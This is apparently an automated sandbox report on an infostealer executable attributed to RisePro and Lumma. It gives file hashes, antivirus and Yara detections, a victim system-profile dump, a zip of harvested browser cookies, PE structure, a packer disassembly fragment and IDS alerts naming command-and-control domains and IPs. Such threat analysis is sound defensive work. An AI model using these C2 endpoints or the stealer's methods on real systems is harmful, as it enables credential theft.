                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):315904
                                                                                                                                            Entropy (8bit):7.9900301024348765
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:6144:DVa+NrJiVBc2wc6oKXwdUWFQg1SGWEWAMiY7ivtaqgntTZXHAYq7:J1NrJaBcOOiHWEWAMFKtdstTfq
                                                                                                                                            MD5:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            SHA1:D44B5C6DD64284F00D6F9D05CF5327A91CAD9339
                                                                                                                                            SHA-256:F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                                                                                                                                            SHA-512:F419ADF4BD07CE18D9B7DE7445B2D0185653DE27738FD4403F880EE11BF49CA8A1958C1B2C94F8F4C5DA52EBC79462CFB6FE71849439F6AF017A95B44AF2F77B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                            • Antivirus: Virustotal, Detection: 77%
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106496
                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:ASCII text, with very long lines (769), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6085
                                                                                                                                            Entropy (8bit):6.038274200863744
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:gxsumX/xKO2KbcRfbZJ5Jxjxcx1xcbza5BC126oxgxA26Fxr/CxbTxqCGYURxOeb:gWFXZQHRFJ5Pts7c3avC126Ygb6Lr/WY
                                                                                                                                            MD5:ACB5AD34236C58F9F7D219FB628E3B58
                                                                                                                                            SHA1:02E39404CA22F1368C46A7B8398F5F6001DB8F5C
                                                                                                                                            SHA-256:05E5013B848C2E619226F9E7A084DC7DCD1B3D68EE45108F552DB113D21B49D1
                                                                                                                                            SHA-512:5895F39765BA3CEDFD47D57203FD7E716347CD79277EDDCDC83A729A86E2E59F03F0E7B6B0D0E7C7A383755001EDACC82171052BE801E015E6BF7E6B9595767F
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):112
                                                                                                                                            Entropy (8bit):4.911305722693245
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:N8DSLvIJiMgTE2WdkQUl7R8DSLvIJiMhKVX3L2WdkQUlv:2OLciodq7R8OLciA8dqv
                                                                                                                                            MD5:978B9515D3688A43726604AC169DF379
                                                                                                                                            SHA1:D61293AB99332FC45CAE37D78AB17A5DA5BCD189
                                                                                                                                            SHA-256:CDEF3FB1CE312E4B67DC5F1B1F9FB551241C08564FDB26AFA4CBF448BB02EA65
                                                                                                                                            SHA-512:86146AA576129B73743B1EBC0BC60880FDA58A11498048B3C68284C4520F1ADC324D016696B0E995A51AC56966E0F38B0AF12458A986868701C6AAAA89C829CB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:https://www.mozilla.org/privacy/firefox/.1696333827..https://www.mozilla.org/en-US/privacy/firefox/.1696333827..
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6914
                                                                                                                                            Entropy (8bit):5.538802664713034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:xHThevAtphWhcmzMwpJCViRE7fNeIj5bATi0elPnPosdlFk3yF4SH892bWdHR4iw:LevAtfWhcmzMwpJCViC7fNeIj5bATi02
                                                                                                                                            MD5:E11B4C48E5DA979A2DBA80ACBECB936D
                                                                                                                                            SHA1:88002EC30400E4665B308B33263EE74F9D7E3CA9
                                                                                                                                            SHA-256:9EB4668F21E2CE2E260507367B0AB33F44C95D938283842C4C76BF940784F281
                                                                                                                                            SHA-512:70D9FA7BDFC25BABF785F4C1A56F09C4EBA5BD4A6A7E3B06296F4095CDA55D72F22948BFCD05CE7207CBED6B412EF7FDDDE8C2F3C771AAF30533D83B3559B3B1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Build: default..Version: 1.9....Date: Sun Apr 21 15:31:16 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: a4627d919c89b35480f35a8f8ec1ed66....Path: C:\Users\user\Desktop\2q45IEa3Ee.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixyBzNJzauM1END....IP: 81.181.57.52..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 675052 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 21/4/2024 15:31:16..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [324]..csrss.exe [408]..wininit.exe [484]..csrss.exe [492]..winlogon.exe [552]..services.exe [620]..lsass.exe [628]..svchost.exe [752]..fontdrvhost.exe [776]..fontdrvhost.exe [7
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4897
                                                                                                                                            Entropy (8bit):2.518316437186352
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                            MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                            SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                            SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                            SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):713144
                                                                                                                                            Entropy (8bit):7.92643296641108
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:CILYYlSXNXiRrDNiydLWO3X6jV/zF0lpgmnEhSiJ/DCIObusXc26cJRvzDPer/:jfl2ZOiy/+pMpmlJLVu/Pzvzry
                                                                                                                                            MD5:C23146B8783F0773242D52E3A3708FD1
                                                                                                                                            SHA1:AC3A28D6F1F56C8B6F07881CC9235FB3FFF24267
                                                                                                                                            SHA-256:B9040135EE594583D255A4A23726CB7B8EE4A8EA3066CD4E6182392AAF2F58DC
                                                                                                                                            SHA-512:122CD8FC1BE913D5CE7E61394D31BB902D42F2AC8AF14515309C3882A1CBAB81925D1DBB1934141DF848A1A2ADB7D8A915AE1FA30401742B66C1D6A45DCD201E
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):701222
                                                                                                                                            Entropy (8bit):7.997879344269176
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:12288:aQRKzFgKQG4f92eGO90/+SHpqRK8Du2GMSsfL8JpgRT7Cd:aQUcGW9VB90m0YgqZJ5087Cd
                                                                                                                                            MD5:8CE396483EFAD54B995C90DA730CE355
                                                                                                                                            SHA1:A62384D1F493FADFDA7648E22BE70C7FC00EE571
                                                                                                                                            SHA-256:B0F4FF756AA89245AD373B36EBF05B4774FB7E37E232FA142F9F912A94B9C296
                                                                                                                                            SHA-512:1C362EF2CCE749FC79A6D457A8B1259F3CF2F9AEF97BF5147855F43BA6B5A732709DCFDA80A96D17FC133C8F864A1974F35990F87245B643E4C275B0CDFDCF88
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zip, Author: Joe Security
                                                                                                                                            Preview:PK.........{.X................Cookies\..PK.........{.XQn.+............Cookies\Chrome_Default.txt.G..r...U.#.5C.....s$..-.D...7.\..$.G.)o....:....Z.C.f_..pm............"..t..t....}.k.@...a.2+P`.0.x.>....s..k%.._..b..P..((......B.....`.7..-m..JY..F....E.*.l.....I..&.....<J..M.......,V...)b.....Q..k......M?.5L....h}......X..'.0..tB.G...\;.a....4.......B4.......J.4.6.y:....4.-.UfE...3A*p.U5UX....Z.g:*e.j.C..Bw..........e..a^.vU:....$..U......B..`._.e.....+...9.{u...7.e...H.]02...%yR".0...x...P<..N....R.}....{.G...;..c..x...kw.'S>.d|.....B..k.9.t.!>.rh...~n.[....s#/....`.!..Kb8%&.vZB`....O|.....>K......L*...d0..03..t...T&.......`N.xp.."..J.......Q.....c..5...).Z.91.6.j..G.....Wr...a.52!..(^.U.....6....dB.D.^...7..0H.\J9.H.$^`e"..d...\....B.8Z=.qeP.3Y.>..'W.X..T..>z...,..K......g....%B.w4#...;.[]u|....v...3.;L..U?..b.....u..*..... .......F...P.a...|R*3.=......r.:.64...#D..^..>.A..ZT.]E........t...f...1..3.....`...X.....C.]%...p.p.ym
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.655592549419492
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:2q45IEa3Ee.exe
                                                                                                                                            File size:2'551'616 bytes
                                                                                                                                            MD5:4a36fa7c0ccbc6842c541a6439ab545a
                                                                                                                                            SHA1:9257009dd59ac4db2518293bcd46be058d937284
                                                                                                                                            SHA256:ca9b2380df90ac17d8c042db4ab442ffad68cc52cd2e557d855f7d571469198f
                                                                                                                                            SHA512:13ef8cf5b3add3445e71f1f1d6047eb571a6ccc439e5bbe63b9a29299ca01030ae8cd1b8b4cbab2cda05936e22e894097744f5e8c77b8149b5c975a707506a77
                                                                                                                                            SSDEEP:49152:p2eDXH3Qb21TmkaSL8sUEFr+mZgl+a2kx+aan/RQTUJN:fD3l1CkaQ8sUEFCmZPa+aIRQW
                                                                                                                                            TLSH:92C501323BFA8BBAE5CACA30DD6FD6A0C5403C96F46646911589B57E12F04DD0B4E4E3
                                                                                                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s...../.s
                                                                                                                                            Icon Hash:7ffbf3bb3b299455
                                                                                                                                            Entrypoint:0x994f20
                                                                                                                                            Entrypoint Section:.boot
                                                                                                                                            Digitally signed:true
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x6624C730 [Sun Apr 21 07:58:40 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:6
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:6
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:6
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:63814aaf116ba6abb6496ce4bcad24c6
                                                                                                                                            Signature Valid:false
                                                                                                                                            Signature Issuer:CN=AVG Technologies USA LLC \u2122\u2030\u2122\u2030\u2122\u2030
                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                            Error Number:-2146762487
                                                                                                                                            Not Before, Not After
                                                                                                                                            • 06/01/2024 10:14:42 07/01/2034 10:14:42
                                                                                                                                            Subject Chain
                                                                                                                                            • CN=AVG Technologies USA LLC \u2122\u2030\u2122\u2030\u2122\u2030
                                                                                                                                            Version:3
                                                                                                                                            Thumbprint MD5:27F5DD79C86B9255242DDB29A51B691E
                                                                                                                                            Thumbprint SHA-1:44268FBAA5D87BA1717C7237701B06FA20E9AF66
                                                                                                                                            Thumbprint SHA-256:1C39A7BBBC7445339DEFD55E21DFA65CDEB9037F0FD33140759077C31CB40BE0
                                                                                                                                            Serial:59AE1233E1806897438DF0EEC7051E17
                                                                                                                                            Instruction
                                                                                                                                            call 00007F9518BDB0A0h
                                                                                                                                            push ebx
                                                                                                                                            mov ebx, esp
                                                                                                                                            push ebx
                                                                                                                                            mov esi, dword ptr [ebx+08h]
                                                                                                                                            mov edi, dword ptr [ebx+10h]
                                                                                                                                            cld
                                                                                                                                            mov dl, 80h
                                                                                                                                            mov al, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            mov byte ptr [edi], al
                                                                                                                                            inc edi
                                                                                                                                            mov ebx, 00000002h
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            jnc 00007F9518BDAF3Ch
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            jnc 00007F9518BDAFA3h
                                                                                                                                            xor eax, eax
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi
                                                                                                                                            adc dl, dl
                                                                                                                                            jnc 00007F9518BDB037h
                                                                                                                                            add dl, dl
                                                                                                                                            jne 00007F9518BDAF57h
                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                            inc esi

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x20e18b | 0x184 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x18a000 | 0x7af22 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x26c210 | 0x2d30 | .themida |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6f4000 | 0x10 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x20f018 | 0x18 | .tls |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x17fa50 | 0x40 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x160f48 | 0x80800 | 1fde0b2f9ba826eb7bb1f3755e4aba55 | False | 0.9998214068579766 | data | 7.999554529460661 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| | 0x162000 | 0x1f1b0 | 0xa600 | cf9194a21763b6043afa5ffc0c1449ea | False | 0.9965173192771084 | data | 7.99286776832715 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| | 0x182000 | 0x72d0 | 0x1600 | 1c099bc9e477f548ffb964f3a4981bdb | False | 0.9872159090909091 | data | 7.929091727373002 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x18a000 | 0x7af22 | 0x7b000 | 4c7fc19900ceba159cbed52fc4994937 | False | 0.301587112550813 | data | 5.082689501285179 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| | 0x205000 | 0x8250 | 0x4800 | 0d417506eb649535b78e0dbb1056624d | False | 0.9876844618055556 | data | 7.963276296922511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .idata | 0x20e000 | 0x1000 | 0x400 | 292e24cf2ac1571d429d8e1f1937f1e5 | False | 0.4013671875 | data | 3.4435698831363544 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x20f000 | 0x1000 | 0x200 | c98d956a508fa697ee774bd4ad91e4ab | False | 0.056640625 | data | 0.18120187678200297 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .themida | 0x210000 | 0x384000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .boot | 0x594000 | 0x15fc00 | 0x15fc00 | 3f280db0b72bf0de9235379a1f9fe774 | False | 0.9848233719793887 | data | 7.949677127496007 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .reloc | 0x6f4000 | 0x1000 | 0x10 | b09d3d350176315db5dfc472dbeca20d | False | 1.5 | GLS_BINARY_LSB_FIRST | 2.349601752714581 | IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| REGINST | 0x18a970 | 0x33d | Windows setup INFormation | English | United States | 0.4487334137515078 |
| RTKICON | 0x18acb0 | 0x4780e | MS Windows icon resource - 7 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixel | English | United States | 0.1045008501833528 |
| SETUPSERVICE_WIN7 | 0x1d24c0 | 0x6000 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | English | United States | 0.20174153645833334 |
| SETUPSERVICE_WIN8 | 0x1d84c0 | 0x2a00 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | English | United States | 0.46000744047619047 |
| RT_ICON | 0x1daec0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.7686170212765957 |
| RT_ICON | 0x1db328 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.6163227016885553 |
| RT_ICON | 0x1dc3d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.43521530817461257 |
| RT_ICON | 0x1ecbf8 | 0x118c7 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0004312803461373 |
| RT_MENU | 0x1fe4c0 | 0x357c | data | | | 0.22509494595384166 |
| RT_MENU | 0x201a3c | 0x8e | data | | | 0.5352112676056338 |
| RT_MENU | 0x201acc | 0x1fe | data | | | 0.37254901960784315 |
| RT_MENU | 0x201ccc | 0x190 | data | | | 0.38 |
| RT_MENU | 0x201e5c | 0x7a2 | data | | | 0.2656090071647902 |
| RT_MENU | 0x202600 | 0x25c | data | | | 0.3509933774834437 |
| RT_MENU | 0x20285c | 0x7ce | data | Korean | North Korea | 0.1981981981981982 |
| RT_MENU | 0x20285c | 0x7ce | data | Korean | South Korea | 0.1981981981981982 |
| RT_MENU | 0x20302c | 0x86 | data | | | 0.5522388059701493 |
| RT_MENU | 0x2030b4 | 0x88 | data | | | 0.5220588235294118 |
| RT_MENU | 0x20313c | 0x64 | data | | | 0.64 |
| RT_MENU | 0x2031a0 | 0xba | data | | | 0.478494623655914 |
| RT_MENU | 0x20325c | 0x126 | data | | | 0.4387755102040816 |
| RT_MENU | 0x203384 | 0xa4 | data | | | 0.5304878048780488 |
| RT_MENU | 0x203428 | 0x28 | data | | | 1.0 |
| RT_MENU | 0x203450 | 0x9c | data | | | 0.5576923076923077 |
| RT_MENU | 0x2034ec | 0x74 | data | | | 0.6724137931034483 |
| RT_MENU | 0x203560 | 0xce | data | | | 0.46601941747572817 |
| RT_MENU | 0x203630 | 0xd6 | data | | | 0.5747663551401869 |
| RT_MENU | 0x203708 | 0x80 | data | | | 0.7109375 |
| RT_MENU | 0x203788 | 0x24 | data | | | 1.0833333333333333 |
| RT_MENU | 0x2037ac | 0x26 | data | | | 1.0263157894736843 |
| RT_MENU | 0x2037d4 | 0x11c | data | | | 0.30633802816901406 |
| RT_MENU | 0x2038f0 | 0x76 | data | | | 0.635593220338983 |
| RT_MENU | 0x203968 | 0xe6 | data | | | 0.4434782608695652 |
| RT_MENU | 0x203a50 | 0x142 | data | | | 0.4192546583850932 |
| RT_MENU | 0x203b94 | 0x18a | data | | | 0.3756345177664975 |
| RT_MENU | 0x203d20 | 0xc6 | data | | | 0.5404040404040404 |
| RT_MENU | 0x203de8 | 0x19c | data | | | 0.2621359223300971 |
| RT_MENU | 0x203f84 | 0x142 | data | | | 0.42857142857142855 |
| RT_MENU | 0x2040c8 | 0x18a | data | | | 0.38071065989847713 |
| RT_MENU | 0x204254 | 0xb4 | data | | | 0.4111111111111111 |
| RT_MENU | 0x204308 | 0x122 | data | | | 0.296551724137931 |
| RT_GROUP_ICON | 0x20442c | 0x3e | data | | | 0.7903225806451613 |
| RT_VERSION | 0x20446c | 0x3cc | data | English | United States | 0.3950617283950617 |
| RT_MANIFEST | 0x204838 | 0x6ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | English | United States | 0.41694915254237286 |

| DLL | Import |
|---|---|
| kernel32.dll | GetModuleHandleA |
| USER32.dll | wsprintfA |
| GDI32.dll | CreateCompatibleBitmap |
| ADVAPI32.dll | RegQueryValueExA |
| SHELL32.dll | ShellExecuteA |
| ole32.dll | CoInitialize |
| WS2_32.dll | WSAStartup |
| CRYPT32.dll | CryptUnprotectData |
| SHLWAPI.dll | PathFindExtensionA |
| gdiplus.dll | GdipGetImageEncoders |
| SETUPAPI.dll | SetupDiEnumDeviceInfo |
| ntdll.dll | RtlUnicodeStringToAnsiString |
| RstrtMgr.DLL | RmStartSession |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Korean | North Korea | |
| Korean | South Korea | |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 04/21/24-15:31:20.586831 | UDP | 2052033 | ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (bordersoarmanusjuw .shop) | 52093 | 53 | 192.168.2.4 | 1.1.1.1 |
| 04/21/24-15:31:25.628405 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49760 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:23.881087 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49754 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:33.821783 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49767 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:26.418186 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49762 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:21.334851 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49743 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:22.307200 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49748 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:41.967279 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49775 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:36.937476 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49771 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:35.293170 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49769 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:24.663338 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49756 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:27.426056 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49764 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:23.027299 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49750 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:23.083597 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49751 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:25.393562 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49758 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:21.497185 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49745 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:43.541138 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49777 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:03.459237 | TCP | 2046269 | ET TROJAN [ANY.RUN] RisePro TCP (Activity) | 49732 | 50500 | 192.168.2.4 | 193.233.132.253 |
| 04/21/24-15:31:23.803046 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49753 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:22.231263 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49747 | 443 | 192.168.2.4 | 172.67.189.66 |
| 04/21/24-15:31:26.161697 | TCP | 2052042 | ET TROJAN Observed Lumma Stealer Related Domain (bordersoarmanusjuw .shop in TLS SNI) | 49761 | 443 | 192.168.2.4 | 172.67.189.66 |
